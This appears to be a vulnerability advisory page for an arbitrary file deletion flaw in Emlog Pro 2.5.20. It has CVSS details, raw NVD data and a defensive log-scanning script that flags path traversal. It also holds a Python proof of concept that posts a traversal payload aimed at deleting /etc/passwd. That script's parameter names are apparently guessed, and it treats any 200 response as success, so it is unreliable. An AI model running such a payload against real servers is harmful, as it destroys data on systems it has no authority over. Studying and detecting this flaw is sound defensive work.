Security Vulnerability Report
CVE-2025-61318 CVSS 9.1 CRITICAL

Published: 2025-12-08 16:15:53
Last Modified: 2025-12-09 16:17:50

Description

Emlog Pro 2.5.20 has an arbitrary file deletion vulnerability. This vulnerability stems from the admin/template.php component and the admin/plugin.php component. They fail to perform path verification and dangerous code filtering for deletion parameters, allowing attackers to exploit this feature for directory traversal.
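A defender can hunt for attempts against the two components named above by scanning web access logs for traversal sequences in request parameters. The following is an added detection example, not code from Emlog or from the original advisory; the log lines are constructed and the parameter names in them are assumptions, since the page does not state the real ones.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Components named in the CVE description.
WATCHED_PATHS = ("/admin/template.php", "/admin/plugin.php")
# A ".." path segment bounded by a slash/backslash or by the ends of the value.
TRAVERSAL = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
# Request part of a combined-format access log line: "METHOD target HTTP/x".
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so a double-encoded %252e%252e is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(log_line):
    """Return [(param, decoded_value)] for traversal values sent to a watched path."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not unquote(url.path).lower().endswith(WATCHED_PATHS):
        return []
    hits = []
    # parse_qsl decodes once; fully_decode peels any further encoding layers.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = fully_decode(value)
        if TRAVERSAL.search(decoded):
            hits.append((name, decoded))
    return hits

def scan(lines):
    """Return {line_index: hits} for every line with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := suspicious_params(line))}

# Constructed sample lines; "action" and "name" are made-up parameter names.
SAMPLE_LOG = [
    '203.0.113.5 - - [09/Dec/2025:10:00:01 +0000] "GET /admin/template.php?action=del&name=default HTTP/1.1" 200 512',
    '203.0.113.5 - - [09/Dec/2025:10:00:07 +0000] "GET /admin/plugin.php?action=del&name=..%2F..%2Fexample.txt HTTP/1.1" 302 0',
    '203.0.113.5 - - [09/Dec/2025:10:00:09 +0000] "GET /admin/template.php?action=del&name=%252e%252e%255c%252e%252e%255cexample.txt HTTP/1.1" 302 0',
    '203.0.113.5 - - [09/Dec/2025:10:00:12 +0000] "GET /index.php?q=..%2Fnotes HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG).items():
        print(f"line {index}: {hits}")
```

Access logs normally record only the query string, so requests that carry the parameter in a POST body need WAF or application-level logging to be covered by the same check.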

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:emlog:emlog:2.5.20:*:*:*:pro:*:*:* - VULNERABLE
Emlog Pro <= 2.5.20

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import os

# CVE-2025-61318 PoC - Arbitrary File Deletion in Emlog Pro 2.5.20
# Target: Emlog Pro admin/template.php or admin/plugin.php
target_url = "http://target.com/admin/template.php"  # or admin/plugin.php
delete_param = "../../../../etc/passwd"  # Path traversal payload

# PoC for arbitrary file deletion via admin template management
payload = {
    "action": "delete",
    "file": delete_param,
    "path": "template"
}

try:
    response = requests.post(target_url, data=payload, timeout=10)
    if response.status_code == 200:
        print("[+] PoC executed successfully - File deletion triggered")
        print(f"[+] Target: {target_url}")
        print(f"[+] Payload: {delete_param}")
    else:
        print("[-] PoC execution failed")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61318", "sourceIdentifier": "[email protected]", "published": "2025-12-08T16:15:52.703", "lastModified": "2025-12-09T16:17:50.223", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Emlog Pro 2.5.20 has an arbitrary file deletion vulnerability. This vulnerability stems from the admin/template.php component and the admin/plugin.php component. They fail to perform path verification and dangerous code filtering for deletion parameters, allowing attackers to exploit this feature for directory traversal."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-24"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:emlog:emlog:2.5.20:*:*:*:pro:*:*:*", "matchCriteriaId": 
"354D41EE-5C72-4BB3-B4CB-B6F67F029912"}]}]}], "references": [{"url": "https://github.com/AndyNull/em/blob/main/emlog%20pro%20-%20del%20vuln.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}